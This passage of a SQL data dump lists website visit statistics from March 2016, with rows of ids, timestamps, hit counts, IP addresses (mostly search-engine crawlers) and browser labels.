,'66.249.92.103','other'),(22869,1458338058,2,2,0,0,'178.154.189.204','other'),(22870,1458338063,1,1,0,0,'37.9.122.203','other'),(22871,1458338068,1,1,0,0,'37.9.122.201','other'),(22872,1458338185,2,0,2,0,'68.180.229.235',''),(22873,1458338287,2,2,0,0,'5.255.253.53','other'),(22874,1458338291,2,2,0,0,'130.193.37.21','other'),(22875,1458338294,3,3,0,0,'141.8.142.41','other'),(22876,1458338356,1,1,0,0,'141.8.142.10','other'),(22877,1458338370,1,1,0,0,'5.255.253.110','other'),(22878,1458338377,1,1,0,0,'178.154.149.11','other'),(22879,1458338433,2,2,0,0,'130.193.37.27','other'),(22880,1458338437,1,1,0,0,'130.193.51.7','other'),(22881,1458338442,1,1,0,0,'5.255.253.100','other'),(22882,1458338446,1,1,0,0,'141.8.132.76','other'),(22883,1458338449,2,2,0,0,'5.255.253.10','other'),(22884,1458338453,1,1,0,0,'130.193.51.85','other'),(22885,1458338459,2,2,0,0,'5.255.253.30','other'),(22886,1458338477,1,1,0,0,'141.8.184.11','other'),(22887,1458338486,1,1,0,0,'141.8.132.2','other'),(22888,1458338500,1,1,0,0,'141.8.184.22','other'),(22889,1458339015,1,1,0,0,'178.154.189.204','other'),(22890,1458339072,1,1,0,0,'95.134.221.122','chrome'),(22891,1458339596,1,0,1,0,'66.249.66.158',''),(22892,1458339629,2,0,2,0,'66.249.78.158',''),(22893,1458339669,1,0,1,0,'66.249.78.151',''),(22894,1458339697,2,0,2,0,'68.180.229.235',''),(22895,1458339854,4,4,0,0,'92.236.71.145','other'),(22896,1458340312,1,1,0,0,'93.158.152.26','other'),(22897,1458340654,1,0,1,0,'66.249.78.151',''),(22898,1458340870,1,1,0,0,'178.154.189.204','other'),(22899,1458341000,1,1,0,0,'157.55.39.78','other'),(22900,1458341017,3,0,3,0,'68.180.229.235',''),(22901,1458341078,1,0,1,0,'66.249.78.30',''),(22902,1458341416,9,8,1,0,'66.249.78.144',''),(22903,1458341463,5,5,0,0,'66.249.66.158','other'),(22904,1458341509,2,2,0,0,'66.249.78.151','other'),(22905,1458341912,2,2,0,0,'144.76.29.162','other'),(22906,1458341954,1,1,0,0,'93.158.152.26','other'),(22907,1458341957,1,1,0,0,'130.193.51.43','other'),(22908,1458342100,1,0,1,0,'66.249.66.166',''),(22909,1458342150,1,1,0,0,'164.132.161.48','other'),(22910,1458342324,1,0,1,0,'66.249.78.144',''),(22911,1458342413,1,1,0,0,'51.255.66.180','other'),(22912,1458342418,2,0,2,0,'66.249.78.158',''),(22913,1458342883,1,1,0,0,'217.69.143.70','other'),(22914,1458342893,1,1,0,0,'130.193.51.45','other'),(22915,1458342927,1,1,0,0,'151.80.31.170','other'),(22916,1458343067,1,0,1,0,'66.249.78.151',''),(22917,1458343351,1,1,0,0,'217.69.143.44','other'),(22918,1458343444,1,1,0,0,'141.8.142.10','other'),(22919,1458343624,5,5,0,0,'80.91.162.99','other'),(22920,1458343743,2,2,0,0,'157.55.39.182','other'),(22921,1458344062,1,1,0,0,'51.255.65.58','other'),(22922,1458344131,1,0,1,0,'68.180.229.235',''),(22923,1458344752,2,0,2,0,'66.249.78.151',''),(22924,1458344798,2,1,1,0,'66.249.78.158',''),(22925,1458344896,5,5,0,0,'5.9.89.170','other'),(22926,1458344974,1,1,0,0,'157.55.39.182','other'),(22927,1458345013,1,1,0,0,'40.77.167.8','other'),(22928,1458345030,1,1,0,0,'8.29.198.25','other'),(22929,1458345105,2,2,0,0,'141.8.184.22','other'),(22930,1458345207,1,0,1,0,'66.249.78.30',''),(22931,1458345589,2,0,2,0,'68.180.229.235',''),(22932,1458345968,1,1,0,0,'141.8.132.2','other'),(22933,1458345972,1,1,0,0,'141.8.142.10','other'),(22934,1458345976,1,1,0,0,'5.255.253.30','other'),(22935,1458345980,1,1,0,0,'130.193.50.22','other'),(22936,1458345984,2,2,0,0,'141.8.132.66','other'),(22937,1458345988,1,1,0,0,'5.255.253.53','other'),(22938,1458345992,1,1,0,0,'130.193.51.43','other'),(22939,1458345995,1,0,1,0,'66.249.78.144',''),(22940,1458345999,1,1,0,0,'141.8.142.8','other'),(22941,1458346003,1,1,0,0,'5.255.253.17','other'),(22942,1458346007,1,1,0,0,'130.193.51.7','other'),(22943,1458346011,1,1,0,0,'130.193.51.55','other'),(22944,1458346019,1,1,0,0,'141.8.132.99','other'),(22945,1458346023,1,1,0,0,'130.193.51.102','other'),(22946,1458346027,1,1,0,0,'93.158.152.65','other'),(22947,1458347730,1,1,0,0,'51.255.65.32','other'),(22948,1458347938,1,1,0,0,'66.249.78.30','other'),(22949,1458348208,1,1,0,0,'51.255.65.88','other'),(22950,1458348362,1,1,0,0,'130.193.51.85','other'),(22951,1458348366,1,1,0,0,'141.8.142.8','other'),(22952,1458348417,1,0,1,0,'66.249.78.144',''),(22953,1458348822,1,1,0,0,'157.55.39.78','other'),(22954,1458348973,1,1,0,0,'66.249.92.103','other'),(22955,1458349036,1,1,0,0,'51.255.65.45','other'),(22956,1458349763,1,1,0,0,'180.76.15.162','other'),(22957,1458349998,1,0,1,0,'68.180.229.235',''),(22958,1458350104,1,1,0,0,'157.55.39.78','other'),(22959,1458350371,1,1,0,0,'51.255.65.44','other'),(22960,1458350836,1,0,1,0,'66.249.78.158',''),(22961,1458350925,2,2,0,0,'157.55.39.182','other'),(22962,1458351050,1,1,0,0,'217.69.143.43','other'),(22963,1458351281,1,0,1,0,'66.249.78.151',''),(22964,1458351522,1,0,1,0,'66.249.66.190',''),(22965,1458351779,1,1,0,0,'66.249.78.158','other'),(22966,1458351902,1,0,1,0,'66.249.66.166',''),(22967,1458351949,1,1,0,0,'164.132.161.83','other'),(22968,1458351995,1,0,1,0,'68.180.229.235',''),(22969,1458352221,1,1,0,0,'66.249.78.37','other'),(22970,1458352430,1,1,0,0,'51.255.65.70','other'),(22971,1458352497,1,1,0,0,'66.249.66.166','other'),(22972,1458352560,2,0,2,0,'66.249.78.151',''),(22973,1458352900,1,0,1,0,'66.249.78.144',''),(22974,1458353368,1,1,0,0,'66.249.78.30','other'),(22975,1458353380,1,1,0,0,'51.255.65.31','other'),(22976,1458353384,1,0,1,0,'66.249.78.158',''),(22977,1458353479,1,1,0,0,'66.249.78.151','other'),(22978,1458353968,1,0,1,0,'68.180.229.235',''),(22979,1458353988,3,3,0,0,'141.8.184.18','other'),(22980,1458354588,1,1,0,0,'217.69.143.46','other'),(22981,1458354815,1,1,0,0,'157.55.39.94','other'),(22982,1458354863,2,2,0,0,'66.249.78.158','other'),(22983,1458355049,1,0,1,0,'66.249.78.37',''),(22984,1458355050,1,0,1,0,'66.249.78.144',''),(22985,1458355066,3,0,3,0,'66.249.78.30',''),(22986,1458355084,2,0,2,0,'66.249.78.151',''),(22987,1458355263,2,1,1,0,'66.249.78.151',''),(22988,1458355304,1,1,0,0,'164.132.161.5','other'),(22989,1458355792,1,1,0,0,'180.76.15.8','other'),(22990,1458355847,1,1,0,0,'180.76.15.150','other'),(22991,1458355848,1,1,0,0,'8.29.198.26','other'),(22992,1458356323,1,1,0,0,'51.255.66.138','other'),(22993,1458356373,1,1,0,0,'66.249.78.158','other'),(22994,1458356428,1,1,0,0,'141.8.184.18','other'),(22995,1458356432,1,1,0,0,'178.154.149.11','other'),(22996,1458356752,1,1,0,0,'157.55.39.182','other'),(22997,1458357084,1,0,1,0,'68.180.229.235',''),(22998,1458357607,1,1,0,0,'66.249.78.158','other'),(22999,1458357653,1,0,1,0,'66.249.78.151',''),(23000,1458357686,2,1,1,0,'66.249.78.151',''),(23001,1458357763,1,1,0,0,'217.69.143.69','other'),(23002,1458357994,1,0,1,0,'66.249.66.158',''),(23003,1458358507,1,1,0,0,'51.255.66.119','other'),(23004,1458358537,1,1,0,0,'157.55.39.182','other'),(23005,1458359016,3,0,3,0,'66.249.78.151',''),(23006,1458359172,1,1,0,0,'46.133.54.230','other'),(23007,1458359182,2,0,2,0,'66.249.78.44',''),(23008,1458359256,1,1,0,0,'217.69.143.47','other'),(23009,1458359329,2,0,2,0,'66.249.78.144',''),(23010,1458359636,1,1,0,0,'217.69.143.67','other'),(23011,1458359770,1,1,0,0,'66.249.92.95','other'),(23012,1458360041,1,1,0,0,'51.255.65.65','other'),(23013,1458360368,4,0,4,0,'66.249.78.151',''),(23014,1458360496,1,1,0,0,'217.69.143.70','other'),(23015,1458360636,2,0,2,0,'66.249.78.144',''),(23016,1458361106,2,0,2,0,'66.249.78.158',''),(23017,1458361335,1,0,1,0,'66.249.78.151',''),(23018,1458362020,1,1,0,0,'180.76.15.163','other'),(23019,1458362185,175,175,0,0,'94.23.214.33','other'),(23020,1458363083,1,1,0,0,'157.55.39.182','other'),(23021,1458363311,1,0,1,0,'66.249.78.144',''),(23022,1458363325,1,1,0,0,'66.249.78.151','other'),(23023,1458363400,1,0,1,0,'66.249.66.133',''),(23024,1458363733,2,2,0,0,'66.249.78.144','other'),(23025,1458363809,1,0,1,0,'66.249.78.37',''),(23026,1458363945,1,1,0,0,'51.255.65.67','other'),(23027,1458363947,1,0,1,0,'68.180.229.235',''),(23028,1458364029,1,1,0,0,'180.76.15.8','other'),(23029,1458364040,1,1,0,0,'164.132.161.48','other'),(23030,1458364056,1,1,0,0,'151.80.31.177','other'),(23031,1458364141,4,2,2,0,'66.249.66.158',''),(23032,1458364304,1,1,0,0,'66.249.78.151','other'),(23033,1458364462,1,0,1,0,'66.249.66.162',''),(23034,1458364559,1,1,0,0,'164.132.161.92','other'),(23035,1458364671,2,1,1,0,'66.249.78.144',''),(23036,1458364753,2,1,1,0,'66.249.66.158',''),(23037,1458364867,1,1,0,0,'217.69.143.46','other'),(23038,1458364893,3,2,1,0,'66.249.78.144',''),(23039,1458365056,1,1,0,0,'37.54.170.224','chrome'),(23040,1458365180,337,337,0,0,'82.193.127.15','other'),(23041,1458365248,2,1,1,0,'66.249.78.144',''),(23042,1458365367,3,2,1,0,'66.249.66.158',''),(23043,1458365486,8,8,0,0,'66.249.78.144','other'),(23044,1458365631,1,0,1,0,'68.180.229.235',''),(23045,1458366081,51,51,0,0,'82.193.127.15','other'),(23046,1458366096,1,1,0,0,'217.69.143.69','other'),(23047,1458366343,2,2,0,0,'66.249.78.158','other'),(23048,1458366465,2,2,0,0,'66.249.66.158','other'),(23049,1458366546,1,1,0,0,'66.249.66.162','other'),(23050,1458366587,3,2,1,0,'66.249.78.144',''),(23051,1458366652,1,1,0,0,'8.29.198.26','other'),(23052,1458366791,7,6,1,0,'66.249.78.144',''),(23053,1458367302,1,1,0,0,'51.255.66.99','other'),(23054,1458367524,4,4,0,0,'66.249.78.144','other'),(23055,1458367733,2,2,0,0,'66.249.66.158','other'),(23056,1458367846,1,1,0,0,'141.8.183.14','other'),(23057,1458367849,1,1,0,0,'130.193.51.81','other'),(23058,1458367853,1,1,0,0,'141.8.132.74','other'),(23059,1458367859,1,0,1,0,'68.180.229.235',''),(23060,1458368014,3,3,0,0,'66.249.78.158','other'),(23061,1458368247,1,1,0,0,'82.193.127.15','other'),(23062,1458368357,1,1,0,0,'157.55.39.182','other'),(23063,1458368521,1,1,0,0,'164.132.161.84','other'),(23064,1458368751,3,0,3,0,'66.249.78.144',''),(23065,1458368957,1,1,0,0,'66.249.78.144','other'),(23066,1458369840,1,1,0,0,'157.55.39.78','other'),(23067,1458370072,1,0,1,0,'66.249.78.158',''),(23068,1458370098,1,1,0,0,'51.255.65.38','other'),(23069,1458370273,1,0,1,0,'66.249.66.158',''),(23070,1458370299,1,0,1,0,'66.249.78.151',''),(23071,1458370402,1,1,0,0,'40.77.167.8','other'),(23072,1458370761,1,1,0,0,'66.249.92.103','other'),(23073,1458370866,1,1,0,0,'66.249.66.158','other'),(23074,1458371357,1,1,0,0,'66.249.78.144','other'),(23075,1458371759,1,0,1,0,'66.249.66.162',''),(23076,1458371924,1,0,1,0,'66.249.78.151',''),(23077,1458371925,1,0,1,0,'68.180.229.235',''),(23078,1458372064,1,0,1,0,'66.249.78.158',''),(23079,1458372273,2,0,2,0,'66.249.78.30',''),(23080,1458372301,1,1,0,0,'207.46.13.88','other'),(23081,1458372558,1,1,0,0,'51.255.66.144','other'),(23082,1458372751,1,1,0,0,'164.132.161.70','other'),(23083,1458373051,1,0,1,0,'66.249.78.158',''),(23084,1458373402,4,0,4,0,'68.180.229.235',''),(23085,1458373615,1,0,1,0,'66.249.66.162',''),(23086,1458373777,1,1,0,0,'141.8.142.8','other'),(23087,1458373781,1,1,0,0,'5.255.253.53','other'),(23088,1458373785,1,1,0,0,'141.8.142.88','other'),(23089,1458373789,1,1,0,0,'130.193.51.22','other'),(23090,1458374050,1,0,1,0,'66.249.78.158',''),(23091,1458374508,1,1,0,0,'66.249.93.90','chrome'),(23092,1458374612,2,2,0,0,'66.249.66.162','other'),(23093,1458374712,2,1,1,0,'66.249.78.151',''),(23094,1458374806,1,1,0,0,'40.77.167.8','other'),(23095,1458375162,1,1,0,0,'51.255.65.17','other'),(23096,1458375198,1,1,0,0,'207.46.13.88','other'),(23097,1458375315,1,1,0,0,'66.249.78.158','other'),(23098,1458375353,1,1,0,0,'91.124.182.203','firefox'),(23099,1458376102,1,1,0,0,'157.55.39.78','other'),(23100,1458376158,45,45,0,0,'5.9.89.170','other'),(23101,1458376363,1,1,0,0,'91.196.178.135','chrome'),(23102,1458376429,1,1,0,0,'46.211.4.131','other'),(23103,1458376557,1,1,0,0,'164.132.161.60','other'),(23104,1458376933,1,0,1,0,'66.249.78.30',''),(23105,1458377392,1,1,0,0,'51.255.65.93','other'),(23106,1458377498,1,1,0,0,'8.29.198.26','other'),(23107,1458377824,1,0,1,0,'66.249.78.158',''),(23108,1458377827,2,0,2,0,'66.249.78.151',''),(23109,1458378479,1,1,0,0,'37.53.76.152','chrome'),(23110,1458379204,1,0,1,0,'66.249.78.151',''),(23111,1458379272,1,1,0,0,'157.55.39.78','other'),(23112,1458379358,1,1,0,0,'66.249.78.144','other'),(23113,1458379368,1,1,0,0,'66.249.66.162','other'),(23114,1458379923,1,1,0,0,'151.80.31.164','other'),(23115,1458380039,1,1,0,0,'164.132.161.93','other'),(23116,1458380160,1,1,0,0,'217.69.143.68','other'),(23117,1458380870,2,0,2,0,'66.249.78.151',''),(23118,1458381012,1,1,0,0,'130.193.37.27','other'),(23119,1458381016,1,1,0,0,'5.255.253.55','other'),(23120,1458381438,1,1,0,0,'51.255.65.37','other'),(23121,1458381675,1,1,0,0,'46.164.155.92','chrome'),(23122,1458381715,1,1,0,0,'180.76.15.14','other'),(23123,1458381755,1,0,1,0,'66.249.78.144',''),(23124,1458381907,1,0,1,0,'66.249.78.151',''),(23125,1458382072,1,1,0,0,'66.249.92.103','other'),(23126,1458382096,2,2,0,0,'207.46.13.88','other'),(23127,1458382332,1,1,0,0,'40.77.167.8','other'),(23128,1458382344,1,0,1,0,'66.249.66.166',''),(23129,1458382366,1,1,0,0,'37.53.89.22','chrome'),(23130,1458382929,2,0,2,0,'66.249.78.151',''),(23131,1458383062,3,0,3,0,'66.249.78.158',''),(23132,1458383467,1,1,0,0,'151.80.31.156','other'),(23133,1458383638,1,1,0,0,'51.255.65.22','other'),(23134,1458384057,1,0,1,0,'66.249.78.30',''),(23135,1458384195,1,0,1,0,'66.249.66.166',''),(23136,1458384262,1,1,0,0,'141.0.15.52','other'),(23137,1458384685,1,0,1,0,'66.249.78.151',''),(23138,1458384938,1,1,0,0,'217.69.143.57','other'),(23139,1458384950,2,0,2,0,'66.249.78.158',''),(23140,1458385287,1,1,0,0,'157.55.39.78','other'),(23141,1458385410,13,13,0,0,'66.249.78.144','other'),(23142,1458385416,1,1,0,0,'178.255.215.95','other'),(23143,1458385431,1,1,0,0,'66.249.66.158','other'),(23144,1458385492,1,1,0,0,'66.249.93.86','chrome'),(23145,1458385770,1,1,0,0,'62.210.215.100','chrome'),(23146,1458386112,1,1,0,0,'66.249.78.158','other'),(23147,1458386338,1,0,1,0,'66.249.78.30',''),(23148,1458386380,1,0,1,0,'66.249.78.37',''),(23149,1458386918,1,1,0,0,'91.196.178.70','chrome'),(23150,1458386937,1,0,1,0,'68.180.229.235',''),(23151,1458387081,1,1,0,0,'51.255.66.138','other'),(23152,1458387582,1,1,0,0,'217.69.143.68','other'),(23153,1458387730,2,0,2,0,'66.249.78.144',''),(23154,1458387823,1,0,1,0,'66.249.78.44',''),(23155,1458387915,1,1,0,0,'94.179.40.53','chrome'),(23156,1458388114,2,0,2,0,'66.249.78.151',''),(23157,1458388348,1,1,0,0,'8.29.198.26','other'),(23158,1458388893,3,0,3,0,'66.249.78.144',''),(23159,1458389054,1,1,0,0,'157.55.39.182','other'),(23160,1458389087,1,1,0,0,'66.249.78.158','other'),(23161,1458389156,2,0,2,0,'68.180.229.235',''),(23162,1458389258,1,1,0,0,'151.80.31.169','other'),(23163,1458389472,2,0,2,0,'66.249.78.151',''),(23164,1458389619,1,1,0,0,'40.77.167.8','other'),(23165,1458389652,1,1,0,0,'82.145.218.76','other'),(23166,1458389664,1,1,0,0,'82.145.218.76','opera'),(23167,1458389878,1,1,0,0,'213.179.252.78','chrome'),(23168,1458389922,1,1,0,0,'91.196.123.162','firefox'),(23169,1458390041,2,0,2,0,'66.249.78.158',''),(23170,1458390343,1,0,1,0,'68.180.229.235',''),(23171,1458390467,1,1,0,0,'207.46.13.88','other'),(23172,1458390522,1,1,0,0,'40.77.167.8','other'),(23173,1458390713,1,1,0,0,'164.132.161.24','other'),(23174,1458390766,2,0,2,0,'66.249.66.162',''),(23175,1458390795,2,0,2,0,'66.249.78.151',''),(23176,1458390827,3,0,3,0,'66.249.78.144',''),(23177,1458390868,1,0,1,0,'66.249.66.129',''),(23178,1458391313,1,1,0,0,'46.211.3.229','chrome'),(23179,1458391321,2,0,2,0,'66.249.78.158',''),(23180,1458391769,1,0,1,0,'66.249.66.158',''),(23181,1458392094,1,0,1,0,'66.249.66.166',''),(23182,1458392190,1,0,1,0,'68.180.229.235',''),(23183,1458392453,1,1,0,0,'66.249.92.99','other'),(23184,1458392646,1,0,1,0,'66.249.78.144',''),(23185,1458392759,1,1,0,0,'217.69.143.54','other'),(23186,1458392760,1,0,1,0,'66.249.78.158',''),(23188,1458393058,1,1,0,0,'66.249.78.158','other'),(23189,1458393816,1,1,0,0,'164.132.161.67','other'),(23190,1458394211,2,1,1,0,'66.249.78.144',''),(23191,1458394281,2,0,2,0,'66.249.78.158',''),(23192,1458394300,1,1,0,0,'51.255.66.104','other'),(23193,1458394665,1,1,0,0,'66.249.78.158','other'),(23194,1458394781,1,1,0,0,'82.145.218.175','other'),(23195,1458394915,1,1,0,0,'82.145.218.175','opera'),(23196,1458394942,1,1,0,0,'51.255.65.21','other'),(23197,1458395252,1,1,0,0,'51.255.66.126','other'),(23198,1458395391,1,1,0,0,'180.76.15.6','other'),(23199,1458395706,1,1,0,0,'82.145.218.175','other'),(23200,1458396083,1,1,0,0,'51.255.66.160','other'),(23201,1458396274,1,0,1,0,'66.249.66.158',''),(23202,1458396481,5,0,5,0,'66.249.78.158',''),(23203,1458396639,4,0,4,0,'66.249.78.144',''),(23204,1458396735,1,1,0,0,'189.219.211.225','chrome'),(23205,1458397056,1,1,0,0,'157.55.39.253','other'),(23206,1458397126,1,1,0,0,'207.46.13.88','other'),(23207,1458397231,1,1,0,0,'164.132.161.8','other'),(23208,1458397345,1,1,0,0,'180.76.15.148','other'),(23209,1458397785,1,1,0,0,'141.8.142.41','other'),(23210,1458397789,1,1,0,0,'141.8.142.88','other'),(23211,1458398196,1,1,0,0,'217.69.143.65','other'),(23212,1458398739,2,0,2,0,'66.249.78.158',''),(23213,1458398825,1,1,0,0,'51.255.65.17','other'),(23214,1458399095,1,1,0,0,'5.255.253.100','other'),(23215,1458399098,1,1,0,0,'141.8.184.18','other'),(23216,1458399183,1,1,0,0,'8.29.198.25','other'),(23217,1458399240,1,0,1,0,'66.249.78.144',''),(23218,1458399292,1,1,0,0,'213.179.252.205','chrome'),(23219,1458399522,1,0,1,0,'66.249.78.151',''),(23220,1458399658,1,0,1,0,'66.249.78.158',''),(23221,1458399881,1,1,0,0,'51.255.65.71','other'),(23222,1458400433,1,0,1,0,'66.249.78.30',''),(23223,1458400497,1,0,1,0,'68.180.229.235',''),(23224,1458400894,2,0,2,0,'66.249.78.151',''),(23225,1458400913,1,0,1,0,'66.249.78.144',''),(23226,1458401054,1,0,1,0,'66.249.78.158',''),(23227,1458401522,1,1,0,0,'130.193.51.85','other'),(23228,1458401526,1,1,0,0,'130.193.37.27','other'),(23229,1458401715,1,0,1,0,'68.180.229.235',''),(23230,1458401787,1,1,0,0,'91.124.182.203','firefox'),(23231,1458402271,1,0,1,0,'66.249.78.158',''),(23232,1458402405,2,0,2,0,'66.249.78.151',''),(23233,1458402465,1,0,1,0,'66.249.78.44',''),(23234,1458402743,2,0,2,0,'66.249.78.144',''),(23235,1458402863,1,1,0,0,'94.179.41.124','firefox'),(23236,1458403301,2,1,1,0,'66.249.78.158',''),(23237,1458403373,1,1,0,0,'66.249.92.103','other'),(23238,1458403592,1,1,0,0,'66.249.78.44','other'),(23239,1458403608,2,0,2,0,'66.249.66.166',''),(23240,1458403661,1,0,1,0,'66.249.78.151',''),(23241,1458404315,1,1,0,0,'130.193.37.21','other'),(23242,1458404319,1,1,0,0,'141.8.132.66','other'),(23243,1458404752,1,0,1,0,'66.249.78.151',''),(23244,1458405360,1,0,1,0,'66.249.78.144',''),(23245,1458405409,16,1,15,0,'66.249.78.144',''),(23246,1458405476,1,1,0,0,'51.255.66.164','other'),(23247,1458405611,1,1,0,0,'178.154.149.9','other'),(23248,1458405614,1,1,0,0,'5.255.253.103','other'),(23249,1458405615,1,1,0,0,'66.249.66.158','other'),(23250,1458405818,3,3,0,0,'138.201.46.148','chrome'),(23251,1458405914,3,0,3,0,'66.249.78.151',''),(23252,1458405979,1,1,0,0,'94.179.40.53','firefox'),(23253,1458406109,1,1,0,0,'217.69.133.222','other'),(23254,1458406430,1,1,0,0,'157.55.39.228','other'),(23255,1458406451,1,0,1,0,'66.249.78.30',''),(23256,1458406551,1,1,0,0,'51.255.66.112','other'),(23257,1458406593,3,0,3,0,'66.249.78.144',''),(23258,1458406690,1,1,0,0,'217.69.133.252','other'),(23259,1458406820,1,0,1,0,'66.249.78.158',''),(23260,1458406892,1,0,1,0,'66.249.78.151',''),(23261,1458406979,3,3,0,0,'66.249.78.151','other'),(23262,1458406982,1,1,0,0,'213.179.252.78','chrome'),(23263,1458406993,1,1,0,0,'217.69.133.233','other'),(23264,1458407031,1,1,0,0,'217.69.133.223','other'),(23265,1458407056,1,1,0,0,'180.76.15.19','other'),(23266,1458407144,3,2,1,0,'66.249.78.144',''),(23267,1458407228,1,1,0,0,'66.249.66.158','other'),(23268,1458407419,1,1,0,0,'93.158.152.9','other'),(23269,1458407423,1,1,0,0,'130.193.51.81','other'),(23270,1458407607,1,0,1,0,'66.249.66.129',''),(23271,1458407806,3,1,2,0,'66.249.78.144',''),(23272,1458407812,1,1,0,0,'207.46.13.107','other'),(23273,1458407917,1,1,0,0,'164.132.161.50','other'),(23274,1458408054,5,3,2,0,'66.249.78.151',''),(23275,1458408184,1,1,0,0,'188.32.135.172','chrome'),(23276,1458408213,1,0,1,0,'66.249.78.158',''),(23277,1458408218,2,2,0,0,'157.55.39.46','other'),(23278,1458408356,1,1,0,0,'5.255.253.53','other'),(23279,1458408360,1,1,0,0,'141.8.184.11','other'),(23280,1458408361,2,2,0,0,'141.8.184.18','other'),(23281,1458408363,1,1,0,0,'5.255.253.10','other'),(23282,1458408364,1,1,0,0,'178.154.149.11','other'),(23283,1458408583,1,1,0,0,'91.196.178.38','chrome'),(23284,1458408673,1,1,0,0,'66.249.66.166','other'),(23285,1458408677,1,1,0,0,'78.111.215.132','chrome'),(23286,1458408690,1,0,1,0,'66.249.66.158',''),(23287,1458408923,1,1,0,0,'66.249.78.158','other'),(23288,1458408993,1,0,1,0,'66.249.78.144',''),(23289,1458409004,2,1,1,0,'66.249.78.151',''),(23290,1458409224,1,1,0,0,'91.124.182.203','firefox'),(23291,1458409299,1,1,0,0,'217.69.143.68','other'),(23292,1458409482,1,1,0,0,'51.255.65.25','other'),(23293,1458409554,1,1,0,0,'51.255.65.71','other'),(23294,1458409681,1,1,0,0,'66.249.78.151','other'),(23295,1458409695,1,1,0,0,'164.132.161.39','other'),(23296,1458409962,1,1,0,0,'217.69.143.51','other'),(23297,1458410070,1,1,0,0,'51.255.65.8','other'),(23298,1458410086,1,1,0,0,'8.29.198.25','other'),(23299,1458410332,2,2,0,0,'92.113.188.209','firefox'),(23300,1458410553,1,0,1,0,'66.249.66.162',''),(23301,1458410718,3,0,3,0,'66.249.78.144',''),(23302,1458410848,2,2,0,0,'178.154.149.11','other'),(23303,1458410942,2,0,2,0,'66.249.66.166',''),(23304,1458410975,1,0,1,0,'66.249.66.158',''),(23305,1458411123,2,0,2,0,'66.249.78.30',''),(23306,1458411133,1,1,0,0,'141.8.142.41','other'),(23307,1458411167,3,0,3,0,'66.249.78.151',''),(23308,1458411531,1,1,0,0,'130.193.51.85','other'),(23309,1458411756,1,1,0,0,'157.55.39.228','other'),(23310,1458411801,1,0,1,0,'66.249.78.144',''),(23311,1458411877,17,17,0,0,'141.8.184.18','other'),(23312,1458411880,17,17,0,0,'178.154.149.11','other'),(23313,1458411893,3,3,0,0,'5.255.253.9','other'),(23314,1458411906,1,1,0,0,'93.158.152.26','other'),(23315,1458411912,1,1,0,0,'130.193.51.81','other'),(23316,1458411915,4,4,0,0,'141.8.142.8','other'),(23317,1458411918,3,3,0,0,'141.8.184.11','other'),(23318,1458411925,1,0,1,0,'68.180.229.235',''),(23319,1458411936,1,1,0,0,'130.193.51.102','other'),(23320,1458411939,1,1,0,0,'5.255.253.10','other'),(23321,1458411953,2,2,0,0,'141.8.132.99','other'),(23322,1458411964,4,4,0,0,'5.255.253.53','other'),(23323,1458411968,7,7,0,0,'93.158.152.9','other'),(23324,1458411973,1,1,0,0,'130.193.37.21','other'),(23325,1458411977,1,1,0,0,'5.255.253.100','other'),(23326,1458412005,11,11,0,0,'141.8.183.14','other'),(23327,1458412608,2,0,2,0,'66.249.78.151',''),(23328,1458412639,2,0,2,0,'66.249.78.158',''),(23329,1458412664,1,1,0,0,'157.55.39.253','other'),(23330,1458412743,9,0,9,0,'66.249.78.144',''),(23331,1458412839,2,1,1,0,'66.249.78.151',''),(23332,1458412848,1,1,0,0,'217.69.143.44','other'),(23333,1458413160,1,0,1,0,'66.249.78.44',''),(23334,1458413305,1,1,0,0,'193.194.127.217','firefox'),(23335,1458413332,2,0,2,0,'66.249.66.158',''),(23336,1458413663,1,1,0,0,'66.249.92.95','other'),(23337,1458413692,2,0,2,0,'66.249.78.144',''),(23338,1458414005,1,1,0,0,'164.132.161.69','other'),(23339,1458414247,3,0,3,0,'66.249.78.151',''),(23340,1458414347,5,5,0,0,'195.154.185.20','other'),(23341,1458414515,1,0,1,0,'66.249.78.158',''),(23342,1458415091,1,0,1,0,'66.249.78.144',''),(23343,1458415112,2,1,1,0,'66.249.78.144',''),(23344,1458415151,4,4,0,0,'80.91.162.99','other'),(23345,1458415496,1,1,0,0,'178.154.149.11','other'),(23346,1458415548,1,0,1,0,'66.249.66.158',''),(23347,1458415747,1,1,0,0,'78.111.190.50','chrome'),(23348,1458415755,1,1,0,0,'111.206.36.132','msie'),(23349,1458416048,3,0,3,0,'66.249.78.151',''),(23350,1458416058,1,1,0,0,'93.158.152.26','other'),(23351,1458416062,2,2,0,0,'141.8.142.10','other'),(23352,1458416066,1,1,0,0,'5.255.253.9','other'),(23353,1458416071,1,1,0,0,'130.193.51.81','other'),(23354,1458416075,2,2,0,0,'130.193.37.21','other'),(23355,1458416080,1,1,0,0,'141.8.132.99','other'),(23356,1458416088,1,1,0,0,'5.255.253.10','other'),(23357,1458416094,1,1,0,0,'141.8.132.97','other'),(23358,1458416518,1,1,0,0,'80.91.162.99','other'),(23359,1458416870,1,1,0,0,'207.46.13.107','other'),(23360,1458416888,3,0,3,0,'66.249.78.158',''),(23361,1458416900,11,0,11,0,'66.249.78.144',''),(23362,1458416996,1,0,1,0,'66.249.78.30',''),(23363,1458417026,2,2,0,0,'141.8.142.8','other'),(23364,1458417139,1,0,1,0,'66.249.66.166',''),(23365,1458417502,5,5,0,0,'141.8.132.66','other'),(23366,1458417503,2,2,0,0,'141.8.132.48','other'),(23367,1458417978,3,3,0,0,'80.91.162.99','other'),(23368,1458417989,1,1,0,0,'66.249.78.144','other'),(23369,1458418051,7,7,0,0,'141.8.132.99','other'),(23370,1458418052,6,6,0,0,'141.8.142.41','other'),(23371,1458418053,4,4,0,0,'141.8.184.31','other'),(23372,1458418054,5,5,0,0,'141.8.184.6','other'),(23373,1458418055,1,1,0,0,'130.193.51.43','other'),(23374,1458418056,5,5,0,0,'5.255.253.30','other'),(23375,1458418101,7,7,0,0,'5.255.253.17','other'),(23376,1458418103,5,5,0,0,'141.8.132.79','other'),(23377,1458418105,5,5,0,0,'141.8.142.55','other'),(23378,1458418116,3,3,0,0,'178.154.189.12','other'),(23379,1458418118,3,3,0,0,'130.193.51.109','other'),(23380,1458418119,5,5,0,0,'5.255.253.9','other'),(23381,1458418128,2,2,0,0,'141.8.142.88','other'),(23383,1458418202,4,4,0,0,'178.154.189.6','other'),(23384,1458418203,5,5,0,0,'141.8.132.74','other'),(23385,1458418444,4,4,0,0,'5.255.253.89','other'),(23386,1458418445,5,5,0,0,'130.193.51.22','other'),(23387,1458418446,1,1,0,0,'5.255.253.53','other'),(23388,1458418447,5,5,0,0,'141.8.132.48','other'),(23390,1458418448,5,5,0,0,'130.193.37.21','other'),(23391,1458418450,3,3,0,0,'5.255.253.10','other'),(23392,1458418451,1,0,1,0,'6